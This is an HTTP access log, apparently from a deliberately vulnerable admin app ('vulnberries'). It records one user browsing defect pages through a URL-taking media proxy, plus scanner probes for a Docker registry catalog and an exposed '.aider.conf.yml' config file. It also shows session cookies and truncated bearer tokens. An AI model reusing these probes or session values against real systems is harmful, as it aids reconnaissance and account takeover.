RemoteAddr: 104.236.121.106:36454
Path: /
URL: /
Method: GET
[2026-03-11 18:04:14] === HTTP Request ===
[2026-03-11 17:55:13] Defects page accessed - IP: 172.30.0.12:46294
===================
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/defects/91959b4f-364e-488d-a1d9-c1de48191a9c
Priority: u=1, i
X-Forwarded-For: 45.85.105.205
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46294
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:55:13] === HTTP Request ===
[2026-03-11 17:54:13] Media proxy request - url: https://media.vulnberries.ru/media?filename=54, IP: 172.30.0.12:46294
===================
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept: */*
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/defects/91959b4f-364e-488d-a1d9-c1de48191a9c
Cookie: auth=sess_1773233005829118282; user_id=9
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46294
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D54
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D54
Method: GET
[2026-03-11 17:54:13] === HTTP Request ===
[2026-03-11 17:54:13] Defect detail page accessed - defect_id: 91959b4f-364e-488d-a1d9-c1de48191a9c, IP: 172.30.0.12:46294
===================
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Referer: https://admin.vulnberries.ru/defects
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46294
Path: /defects/91959b4f-364e-488d-a1d9-c1de48191a9c
URL: /defects/91959b4f-364e-488d-a1d9-c1de48191a9c
Method: GET
[2026-03-11 17:54:13] === HTTP Request ===
[2026-03-11 17:51:14] Defects page accessed - IP: 172.30.0.12:52802
===================
X-Forwarded-For: 45.85.105.205
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/defects
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52802
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:51:14] === HTTP Request ===
[2026-03-11 17:51:13] Defects page accessed - IP: 172.30.0.12:52802
===================
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52802
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:51:13] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57942
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-11 17:49:11] === HTTP Request ===
[2026-03-11 17:38:31] Defect detail page accessed - defect_id: b78f03e5-4524-4cb6-b982-feebf83e3cbe, IP: 172.30.0.12:42600
===================
Via: 2.0 Caddy
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Cookie: auth=sess_1773233005829118282; user_id=9
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Priority: u=1, i
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42600
Path: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
URL: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Method: GET
[2026-03-11 17:38:31] === HTTP Request ===
[2026-03-11 17:37:54] Main page accessed - IP: 167.172.90.204:54186
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 167.172.90.204:54186
Path: /
URL: /
Method: GET
[2026-03-11 17:37:54] === HTTP Request ===
===================
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Accept-Encoding: gzip
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.197.201.114:43506
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 17:36:40] === HTTP Request ===
[2026-03-11 17:36:38] Main page accessed - IP: 192.197.201.114:43498
===================
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Accept-Encoding: gzip
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "macOS"
Cache-Control: no-cache
Accept-Language: en;q=0.9
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 192.197.201.114:43498
Path: /
URL: /
Method: GET
[2026-03-11 17:36:38] === HTTP Request ===
===================
Accept-Language: en;q=0.9
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Sec-Fetch-Site: none
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Cache-Control: no-cache
Accept-Encoding: gzip
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 123.160.223.73:14897
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 17:36:23] === HTTP Request ===
===================
Accept-Encoding: gzip
Sec-Fetch-Site: none
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en;q=0.9
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Cache-Control: no-cache
Pragma: no-cache
Sec-Fetch-Mode: navigate
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 123.160.223.73:14898
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 17:36:22] === HTTP Request ===
[2026-03-11 17:36:22] Main page accessed - IP: 123.160.223.72:38657
===================
Pragma: no-cache
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Platform: "macOS"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Language: en;q=0.9
Accept-Encoding: gzip
Sec-Fetch-Dest: document
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 123.160.223.72:38657
Path: /
URL: /
Method: GET
[2026-03-11 17:36:22] === HTTP Request ===
[2026-03-11 17:36:22] Main page accessed - IP: 123.160.223.73:14836
===================
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Cache-Control: no-cache
Accept-Language: en;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Pragma: no-cache
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 123.160.223.73:14836
Path: /
URL: /
Method: GET
[2026-03-11 17:36:22] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.237.114.52:25672
Path: /v2/_catalog
URL: /v2/_catalog
Method: GET
[2026-03-11 17:35:54] === HTTP Request ===
[2026-03-11 17:35:14] Defects page accessed - IP: 172.30.0.12:47546
===================
X-Forwarded-Proto: https
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects/785906f2-e801-4f17-9faf-81aec59d21e3
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Mode: cors
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47546
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:35:14] === HTTP Request ===
[2026-03-11 17:34:56] Media proxy request - url: https://media.vulnberries.ru/media?filename=8, IP: 172.30.0.12:47546
===================
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Via: 2.0 Caddy
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects/785906f2-e801-4f17-9faf-81aec59d21e3
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Priority: u=1, i
If-Modified-Since: Wed, 04 Mar 2026 14:43:30 GMT
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47546
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D8
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D8
Method: GET
[2026-03-11 17:34:56] === HTTP Request ===
[2026-03-11 17:34:56] Defect detail page accessed - defect_id: 785906f2-e801-4f17-9faf-81aec59d21e3, IP: 172.30.0.12:47546
===================
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Mode: cors
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47546
Path: /defects/785906f2-e801-4f17-9faf-81aec59d21e3
URL: /defects/785906f2-e801-4f17-9faf-81aec59d21e3
Method: GET
[2026-03-11 17:34:56] === HTTP Request ===
[2026-03-11 17:32:54] Defects page accessed - IP: 172.30.0.12:59112
===================
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Accept: */*
Authorization: Bearer Bearer eyJhbGciOiJIU...
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:59112
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:32:54] === HTTP Request ===
[2026-03-11 17:32:42] Defect detail page accessed - defect_id: b78f03e5-4524-4cb6-b982-feebf83e3cbe, IP: 172.30.0.12:59112
===================
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects
Priority: u=1, i
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:59112
Path: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
URL: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Method: GET
[2026-03-11 17:32:42] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50008
Path: /.aider.conf.yml
URL: /.aider.conf.yml
Method: GET
[2026-03-11 17:32:37] === HTTP Request ===
[2026-03-11 17:31:24] Defects page accessed - IP: 172.30.0.12:59112
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.205
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Priority: u=1, i
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:59112
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:31:24] === HTTP Request ===
[2026-03-11 17:31:08] Defect detail page accessed - defect_id: b78f03e5-4524-4cb6-b982-feebf83e3cbe, IP: 172.30.0.12:59112
===================
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1773233005829118282; user_id=9
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/defects
Priority: u=1, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:59112
Path: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
URL: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Method: GET
[2026-03-11 17:31:08] === HTTP Request ===
[2026-03-11 17:28:25] Defects page accessed - IP: 172.30.0.12:46934
===================
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:28:25] === HTTP Request ===
[2026-03-11 17:27:51] Main page accessed - IP: 172.30.0.12:46934
===================
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/defects
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
X-Forwarded-Proto: https
Cookie: auth=sess_1773233005829118282; user_id=9
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Path: /
URL: /
Method: GET
[2026-03-11 17:27:51] === HTTP Request ===
[2026-03-11 17:27:50] Defects page accessed - IP: 172.30.0.12:46934
===================
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Mode: cors
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Cookie: auth=sess_1773233005829118282; user_id=9
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Path: /defects
URL: /defects
Method: GET
[2026-03-11 17:27:50] === HTTP Request ===
[2026-03-11 17:27:36] Media proxy request - url: https://media.vulnberries.ru/media?filename=2, IP: 172.30.0.12:46934
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Accept: */*
Referer: https://admin.vulnberries.ru/defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Sec-Fetch-Mode: cors
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
If-Modified-Since: Wed, 04 Mar 2026 14:43:21 GMT
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46934
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Method: GET
[2026-03-11 17:27:36] === HTTP Request ===
===================
Sec-Ch-Ua-Mobile: ?0
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
